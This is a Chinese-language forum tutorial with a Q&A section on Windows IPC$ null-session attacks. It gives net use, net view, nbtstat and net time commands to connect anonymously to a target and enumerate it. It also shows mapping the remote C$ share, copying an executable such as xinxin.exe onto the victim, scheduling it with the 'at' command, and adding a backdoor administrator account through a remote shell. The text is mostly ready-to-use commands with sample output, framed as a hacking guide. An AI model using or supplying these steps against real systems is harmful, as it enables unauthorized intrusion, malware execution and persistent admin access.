1 首先,我们先建立一个空连接(当然,这需要目标开放ipc$)
命令:net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] "" /user:""
注意:上面的命令包括四个空格,net与use中间有一个空格,use后面一个,密码左右各一个空格。
2 查看远程主机的共享资源
命令:net view [url=file://\\ip]\\ip[/url]
解释:前提是建立了空连接后,用此命令可以查看远程主机的共享资源,如果它开了共享,可以得到如下面的结果,但此命令不能显示默认共享。
在 \\*.*.*.*的共享资源
资源共享名 类型 用途 注释
-----------------------------------------------------------
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
命令成功完成。
3 查看远程主机的当前时间
命令: net time [url=file://\\ip]\\ip[/url]
解释:用此命令可以得到一个远程主机的当前时间。
4 得到远程主机的NetBIOS用户名列表(需要打开自己的NBT)
命令:nbtstat -A ip
用此命令可以得到一个远程主机的NetBIOS用户名列表,返回如下结果:
Node IpAddress: [*.*.*.*] Scope Id: []
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
SERVER UNIQUE Registered
OYAMANISHI-H GROUP Registered
OYAMANISHI-H GROUP Registered
SERVER UNIQUE Registered
OYAMANISHI-H UNIQUE Registered
OYAMANISHI-H GROUP Registered
SERVER UNIQUE Registered
OYAMANISHI-H UNIQUE Registered
..__M##ROWSE__. GROUP Registered
INet~Services GROUP Registered
IS~SERVER...... UNIQUE Registered
MAC Address = 00-50-8B-9A-2D-37
1 建立/删除ipc$连接的命令
1)建立空连接:
net use [url=file://\\127.0.0.1\ipc$]\\127.0.0.1\ipc$[/url] "" /user:""
2)建立非空连接:
net use [url=file://\\127.0.0.1\ipc$]\\127.0.0.1\ipc$[/url] "密码" /user:"用户名"
3)删除连接:
net use [url=file://\\127.0.0.1\ipc$]\\127.0.0.1\ipc$[/url] /del
2 在ipc$连接中对远程主机的#作命令
1) 查看远程主机的共享资源(看不到默认共享):
net view [url=file://\\127.0.0.1]\\127.0.0.1[/url]
2) 查看远程主机的当前时间:
net time [url=file://\\127.0.0.1]\\127.0.0.1[/url]
3) 得到远程主机的netbios用户名列表:
nbtstat -A 127.0.0.1
4)映射/删除远程共享:
net use z: [url=file://\\127.0.0.1\c]\\127.0.0.1\c[/url]
此命令将共享名为c的共享资源映射为本地z盘
net use z: /del
删除映射的z盘,其他盘类推
5)向远程主机复制文件:
copy 路径\文件名 [url=file://\\IP\]\\IP\[/url]共享目录名,如:
copy c:\xinxin.exe [url=file://\\127.0.0.1\c$]\\127.0.0.1\c$[/url] 即将c盘下的xinxin.exe复制到对方c盘内
当然,你也可以把远程主机上的文件复制到自己的机器里:
copy [url=file://\\127.0.0.1\c$\xinxin.exe]\\127.0.0.1\c$\xinxin.exe[/url] c:\
6)远程添加计划任务:
at [url=file://\\IP]\\IP[/url] 时间 程序名 如:
at [url=file://\\127.0.0.0]\\127.0.0.0[/url] 11:00 xinxin.exe
注意:时间尽量使用24小时制;如果你打算运行的程序在系统默认搜索路径(比如system32/)下则不用加路径,否则必须加全路径
3 本地命令
1)查看本地主机的共享资源(可以看到本地的默认共享)
net share
2)得到本地主机的用户列表
net user
3)显示本地某用户的帐户信息
net user 帐户名
4)显示本地主机当前启动的服务
net start
5)启动/关闭本地服务
net start 服务名
net stop 服务名
6)在本地添加帐户
net user 帐户名 密码 /add
7)激活禁用的用户
net uesr 帐户名 /active:yes
8)加入管理员组
net localgroup administrators 帐户名 /add
很显然的是,虽然这些都是本地命令,但如果你在远程主机的shell中输入,比如你telnet成功后输入上面这些命令,那么这些本地输入将作用在远程主机上。
8.我用net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] "" /user ""成功的建立了一个空会话,但用nbtstat -A IP 却无法导出用户列表,这是为什么?
答:空会话在默认的情况下是可以导出用户列表的,但如果管理员通过修改注册表来禁止导出列表,就会出现你所说的情况;还有可能是你自己的NBT没有打开,netstat命令是建立在NBT之上的。
14.我用net use [url=file://\\192.168.0.2\ipc$]\\192.168.0.2\ipc$[/url] "password" /user:"administrator" 成功,可是 net use i: [url=file://\\192.168.0.2\c]\\192.168.0.2\c[/url]
出现请键入 [url=file://\\192.168.0.2]\\192.168.0.2[/url] 的密码,怎么回事情呢?我用的可是管理员呀?应该什么都可以访问呀?
答:虽然你具有管理员权限,但管理员在设置c盘共享权限时(注意:普通共享可以设置访问权限,而默认共享则不能)可能并未设置允许administrator访问,所以会出现上述问题。
17.您看看这是怎么回事?
F:\>net time
找不到时间服务器。
请键入 NET HELPMSG 3912 以获得更多的帮助。
答:答案很简单,你的命令错了,应该是net time [url=file://\\ip]\\ip[/url]
没输入ip地址,当然找不到服务器。view的命令也应该有ip地址,即:net view [url=file://\\ip]\\ip[/url]